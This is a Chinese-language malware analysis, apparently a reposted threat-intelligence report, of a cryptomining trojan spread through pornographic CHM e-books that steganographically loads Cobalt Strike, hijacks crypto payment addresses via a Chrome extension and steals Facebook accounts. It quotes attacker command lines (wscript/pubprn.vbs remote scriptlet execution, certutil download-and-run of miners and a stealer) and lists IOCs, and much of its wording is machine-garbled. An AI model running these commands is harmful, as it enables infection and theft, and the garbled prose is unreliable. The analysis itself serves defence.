快捷搜索:  网络  后门  CVE  渗透  木马  扫描  黑客  as

挖矿木马借“XX的隐秘”等小黄书疯传,中毒后会挟制比特币交易

1、概述

近期腾讯御见威胁情报中心拿获到行使一堆色情类电子书(chm格式)传播的恶意挖矿病毒病毒使用一批极具诱惑力的文件名(本文阐发样本使用名为“想不想知道xx之间的隐秘.chm”)在收集中传播。

1.png挖矿木马借“XX的隐秘”等小黄书疯传

病毒使用执行遥程脚本的要领,并结合白行使,代码混淆,无文件内存装载等手艺来藏避安全厂商的查杀,受害者一旦关上这些chm格式的电子书,病毒便会隐躲进用户机器中。

病毒目前举动首要有开释挖矿病毒,装置Chrome阅读器恶意插件,在用户交易捏造加密币时挟制收款地址,盗取用户facebook帐号信息,并自动在facebook网站分享多少“小黄书”chm下载链接完成蠕虫式的传播。

挖矿木马借“XX的隐秘”等小黄书疯传

二、样本阐发

chm文档结构以下图,运行chm文档后文档内Load_HTML_CHM0.html内混淆的脚本代码会以命令行”C:\Windows\System32\wscript.exe” /b C:/Windows/System32/Printing_Admin_Scripts/zh-CN/pubprn.vbs 127.0.0.1 script:hxxp://png.realtimenews.tk/chm.sct 

来执行hxxp://png.realtimenews.tk/chm.sct内的遥程脚本。

3.png挖矿木马借“XX的隐秘”等小黄书疯传

脚本代码通过走访一个外部链接的图片q.png,并查找图片数据中的tEXt,iENd两个标记,截取tEXt+4地位到iENd-8处的文件内容,Base64解码后存放到Temp目录以tmpg.Jpg命名,并用Rundll32.exe拉起执行,tmpg.Jpg实在为一个带有导出函数VoidFunc且加壳的DLL。

截取png中隐躲数据

挖矿木马借“XX的隐秘”等小黄书疯传

q.png表象上看为一个透明违景中心发亮的PNG图片。

挖矿木马借“XX的隐秘”等小黄书疯传

q.png文件tEXt+4地位指向了一个BASE64编码的PE文件内容最先地位.

挖矿木马借“XX的隐秘”等小黄书疯传

q.png文件iENd-8指向了一个BASE64编码的PE文件内容末尾地位。

挖矿木马借“XX的隐秘”等小黄书疯传

Rundll32.exe进一步拉起执行tmpg.Jpg

挖矿木马借“XX的隐秘”等小黄书疯传

tmpg.Jpg为带有导出函数VoidFunc的DLL

挖矿木马借“XX的隐秘”等小黄书疯传

被RunDll32拉起的tmpg.Jpg通过执行导出函数VoidFun,然后在内存中解密出一段Shellcode,通过CreateThread的方式执行起来。

创建线程执行Shellcode

挖矿木马借“XX的隐秘”等小黄书疯传

Shellcode代码通过遍历LDR链找到kernel32模块,然后获取LoadLibraryA的地址,加载Wininet模块,然后获得一系列收集操作函数

InternetConnectA,httpOpenRequestA,httpSendRequestA地址调用,终极向域名

dazqc4f140wtl.cloudfront.net发送一个Get收集要求,并使用InternetReadFIle来接收收集文件数据流,要求域名躲在Shellcode的尾部。

Shellcode装载Wininet模块

挖矿木马借“XX的隐秘”等小黄书疯传

Get要求域名躲在解密后的Shellcode尾部

挖矿木马借“XX的隐秘”等小黄书疯传

通过抓包工具可以直接看到,Get要求后服务器发送归来的数据流有一个明文的PE文件,通过从内存Dump出该模块可知该模块照样一个DLL,并使用反射式加载的要领,完成该模块代码不落地装载。

病毒Get要求后返归的明文PE文件数据流

挖矿木马借“XX的隐秘”等小黄书疯传

反射式加载的DLL

挖矿木马借“XX的隐秘”等小黄书疯传

观察该模块可知为Cobalt Strike生成的DLL后门攻击模块,该后门攻击模块数据交互支持HTTP、HTTPS、DNS以及SMB地道协定,本次样本使用HTTP协定的方式进行通讯交互,后门攻击模块起首通过异或0×69解密出上线设置信息。

使用异或解密设置信息

挖矿木马借“XX的隐秘”等小黄书疯传

解密后的后门明文C2信息,Url、UserAgent信息

挖矿木马借“XX的隐秘”等小黄书疯传

通过抓包时可获得服务器下发指令,指令中有指向遥程脚本连接显然字段hxxp://d3goboxon32grk2l.tk/reg9.sct,该指令首要为完成挖矿举动。

下发指令信息

挖矿木马借“XX的隐秘”等小黄书疯传

遥程脚本reg9.sct会在体系中添加两个启动项,ps5.txt为一个Html页面,其中夹杂混淆的vbs脚本代码,reg9.sct启动项保障其自身遥程脚本逻辑每一次开机执行,并结合wmic放开持久性攻击。

相干脚本代码

挖矿木马借“XX的隐秘”等小黄书疯传

启动项

挖矿木马借“XX的隐秘”等小黄书疯传

以后reg9.sct脚本通过走访hxxp://d3goboxon32grk2l.tk/gd32.txt 或者gd64.txt链接获取文件流数据然后再内陆temp目录创建启动一个名为explore.exe的进程,其中会判定体系版本进一步适配x86或x64的对应程序。

创建运行挖矿程序

挖矿木马借“XX的隐秘”等小黄书疯传

.txt后缀文本实际为加Vmp壳的exe可执行文件

挖矿木马借“XX的隐秘”等小黄书疯传

观察挖矿内部信息可知为挖矿端程序,矿池以及钱包地址以明文情势存放。除此外,矿机程序还会走访执行

hxxp://down.cacheoffer.tk/d2/reg9.sct、hxxp://xmr.enjoytopic.tk/d2/reg9.sct两个地址中的遥程脚本,阐发时down.cacheoffer.tk/d2/reg9.sct脚本已经清空内容,不排除之后病毒作者继续使用的可能性,xmr.enjoytopic.tk/d2/reg9.sct中的脚本会再次拉取挖矿程序以及添加病毒启动项来确保病毒正常运行。

reg9.sct自身也会开释名为evil或evil2的js脚本到Temp目录执行,js脚本的运行一样是为了确保挖矿病毒运行成功。

挖矿病毒内明文内容

挖矿木马借“XX的隐秘”等小黄书疯传

病毒使用门罗币钱包当前信息

挖矿木马借“XX的隐秘”等小黄书疯传

ps5.txt内有一个混淆的vbs脚本文件,脚本代码执行后会带参数结合dotnet静态要领执行PowerShell,收拾整理后的dotnet相干代码阐发可知,作用为申请内存创建线程来执行一段Base64编码过的Shellcode。

ps5.txt中混淆的vbs脚本代码如图所示

挖矿木马借“XX的隐秘”等小黄书疯传

PwoerShell去混淆后的dotnet代码

挖矿木马借“XX的隐秘”等小黄书疯传

对Shellcode解码可知与文章开头的tmpg.Jpg中的Shellcode代码相似度极高,依然会尝试读取收集文件,不同点是隐躲在Shellcode尾部的域名改成了ssl2.blockbitcoin.com,阐发时测试该域名已暂时没法解析,不排除之后病毒团伙会再次启用。

一样躲在Shellcode尾部的域名

挖矿木马借“XX的隐秘”等小黄书疯传

reg9.sct最后还会拉起一个带dotnet要领参数的PowerShell,此处参数混淆的要领与ps5.txt处相比首要为数据压缩方式上有不同,收拾整理混淆代码后阐发可知为从云端拉取一个fs.png的文件数据,此文件与文章开头使用脚本拉取的q文件同样是个透明违景的图片,并且在图片内部通过标签tEXt+4以及标签IEND-12定位到图片中以BASE64编码的Shellcode代码,解码后Shellcode中隐躲了一个DLL,Shellcode首要功能为加载这个DLL。

混淆的PowerShell参数

挖矿木马借“XX的隐秘”等小黄书疯传

收拾整理混淆后的相干代码

挖矿木马借“XX的隐秘”等小黄书疯传

图片中解码出的Shellcode文件

挖矿木马借“XX的隐秘”等小黄书疯传

DLL恶意代码执行后会查找Chrome进程,要是当前Chrome进程正在运行,则结束掉Chrome进程,然后以静默的方式开释装置Chrome.crx插件包,进一步达到挟制用户比特币交易接受地址,窃取用户facebook交际帐号以及行使交际帐号进一步分享恶意的chm文档传播的功能。

查找结束Chome阅读器进程

挖矿木马借“XX的隐秘”等小黄书疯传

创建Chrome.crx插件包

挖矿木马借“XX的隐秘”等小黄书疯传

创建Chrome文件夹并在其中创建名为sec.vbe,manifest.json,background.js,content.js,黑客技术,page.js的脚本文件。

挖矿木马借“XX的隐秘”等小黄书疯传

运行sec.vbe脚本,作用为装载Chrome.crx插件包。

挖矿木马借“XX的隐秘”等小黄书疯传

下图为装置插件包时的命令行,可知使用–silent-launch参数来隐躲阅读器窗口装置插件,观察插件相干的混淆js脚本代码可知,插件首要功能为替代捏造货币交易时的收款地址,二维码信息。此外,还会窃取交际站点帐号暗码,然后下载chm文档并上传到交际站点恶意的chm分享连接来进一步传播。

插件包装置命令行

挖矿木马借“XX的隐秘”等小黄书疯传

js中用来替代的比特币收款地址,二维码信息以及门罗币地址

挖矿木马借“XX的隐秘”等小黄书疯传

替代收款地址相干代码

挖矿木马借“XX的隐秘”等小黄书疯传

窃取帐号的交际站点过滤信息

挖矿木马借“XX的隐秘”等小黄书疯传

js中的相干的facebook分享连接

挖矿木马借“XX的隐秘”等小黄书疯传

js中会走访一个恶意地址连接,返归的BASE64编码的数据流

挖矿木马借“XX的隐秘”等小黄书疯传

内陆解码数据文件测试为一个chm文档,此文档以及文章开头的恶意行使文档相似,依然含有恶意代码,目的为进一步通过分享来扩散传播。

挖矿木马借“XX的隐秘”等小黄书疯传

3、历史样本

chm格式作为一种常见的文档类型,经常被造孽分子恶意行使,腾讯御见威胁情报中心对此类型病毒早有监控,例如客岁双11期间,腾讯安全团队监控到的“Torchwood遥控木马”,该木马通过量种手段对电商行业进行钓鱼攻击。受害者一旦运行了钓鱼文档,极有可能导致电脑中的重要资料被窃取。

本次病毒样本中,通过C2地址blockbitcoin.com我们也关联到了客岁腾讯安全团队发现的一块儿“行使redis漏洞入侵服务器挖矿”的攻击案例。对比两次案例可知,两次事故中攻击者不止使用了相同的C2,作案方式伎俩也很相似,可推测为同一团伙所为。而在“行使redis漏洞入侵服务器挖矿”事故中,我们也拿获到了该团伙更多的C2的下发指令,首要有下列部分内容。

指令1:mshta hxxp://winapt.s3-accelerate.amazonaws.com/vbs.hta

该程序会扫描计算机目录下的有bitcoin字符串的文件,然后通过文件中的url地址上传。

Vbs.hta

挖矿木马借“XX的隐秘”等小黄书疯传

上传页面

挖矿木马借“XX的隐秘”等小黄书疯传

指令2:

certutil -urlcache -split -f hxxp://winapt.s3-accelerate.amazonaws.com/rigd32.exe svchost.exe && svchost.exe -o pool.minexmr.com:5555 -u 

45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV -p %COMPUTERNAME% -k -B && certutil -urlcache -split -f hxxp://winapt.s3-accelerate.amazonaws.com/rigd32.exe deleteZcertutil -urlcache -split -f hxxp://winapt.s3-accelerate.amazonaws.com/rigd64.exe svhost.exe && svhost.exe -o pool.minexmr.com:5555 -u 

45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV -p %COMPUTERNAME% -k -B && certutil -urlcache -split -f hxxp://winapt.s3-accelerate.amazonaws.com/rigd64.exe deletecertutil -urlcache -split -f hxxp://winapt.s3-accelerate.amazonaws.com/tg.exe svthost.exe && svthost.exe && certutil 

-urlcache -split -f hxxp://winapt.s3-accelerate.amazonaws.com/tg.exe

该指令会下载矿机挖矿,然后去下载tg.exe文件,tg.exe会开启窃取隐衷信息线程,线程最先先查找%temp%下.txt文件是否存在并且是否有内容,要是不存在,说明没有窃守信息,则最先窃守信息,并写入文件内。

盗守信息

挖矿木马借“XX的隐秘”等小黄书疯传

窃取Chrome缓存

挖矿木马借“XX的隐秘”等小黄书疯传

窃取Firefox信息

挖矿木马借“XX的隐秘”等小黄书疯传

查找Firefox设置文件,并行使nss3.dll函数解密

挖矿木马借“XX的隐秘”等小黄书疯传

盗取cookies

挖矿木马借“XX的隐秘”等小黄书疯传

此病毒还会通过hxxps://pastebin.com/raw/21Yaa7xn走访

hxxps://emsisoft.github.io/a.html的一个js挖矿。

走访链接

挖矿木马借“XX的隐秘”等小黄书疯传

JS挖矿链接

挖矿木马借“XX的隐秘”等小黄书疯传

4、溯源

通过关联到的往期病毒相干信息,对js挖矿页面的溯源发现,该网站是github申请的小我私人网站,在该项目中,发现b.html一样是JS挖矿。

github中的项目信息

挖矿木马借“XX的隐秘”等小黄书疯传

JS挖矿代码

挖矿木马借“XX的隐秘”等小黄书疯传

在其中一份代码发现疑似作者信息。

挖矿木马借“XX的隐秘”等小黄书疯传

作者收躲的网站钓鱼项目

挖矿木马借“XX的隐秘”等小黄书疯传

5、安全建议

提醒用户注意下列几点:

一、建议任何时辰关上疑似色情内容的文件,须特别小心。病毒木马传播者最善于行使色情内容做掩护传播病毒木马;

2、若发现电脑变得异常卡慢,可先通过义务治理器检查体系资源占用情形,若CPU、GPU使用率长时间显然偏高,可嫌疑是否遭受挖矿病毒攻击,建议使用安全软件检查;

三、小我私人用户可使用安全产品,拦截可能的病毒攻击。

6、IOCs

Md5

35F24CC5B580DBBF3F516663E7167B9A

EA71DF605CB95A14E0FB3B4FA0A92EC7

6D2648F5DE9B1CBDEE6D6FC67573C239

F6C616D0B19FB276BDC511D8BE2BF6D1

1B3BF4165CA43E964E1FD25BB6F99DF5

691D2B814127CC37548162ED2955824C

C2

dazqc4f140wtl.cloudfront.net

blockbitcoin.com

ssl2.blockbitcoin.com

Url

hxxp://png.realtimenews.tk/chm.sct

hxxp://png.realtimenews.tk/q.png

hxxp://png.realtimenews.tk/fs.png

hxxp://d3goboxon32grk2l.tk/reg9.sct

hxxp://d3goboxon32grk2l.tk/ps5.txt

hxxp://down.cacheoffer.tk/d2/reg9.sct

hxxp://xmr.enjoytopic.tk/d2/reg9.sct

hxxp://news.realnewstime.xyz/news/us

hxxp://winapt.s3-accelerate.amazonaws.com/vbs.hta

hxxp://winapt.s3-accelerate.amazonaws.com/rigd32.exe

hxxp://winapt.s3-accelerate.amazonaws.com/rigd64.exe

hxxp://winapt.s3-accelerate.amazonaws.com/tg.exe

hxxps://pastebin.com/raw/21Yaa7xn

hxxps://emsisoft.github.io/a.html

hxxp://abx.azurewebsites.net/blobupload/windows

*

您可能还会对下面的文章感兴趣: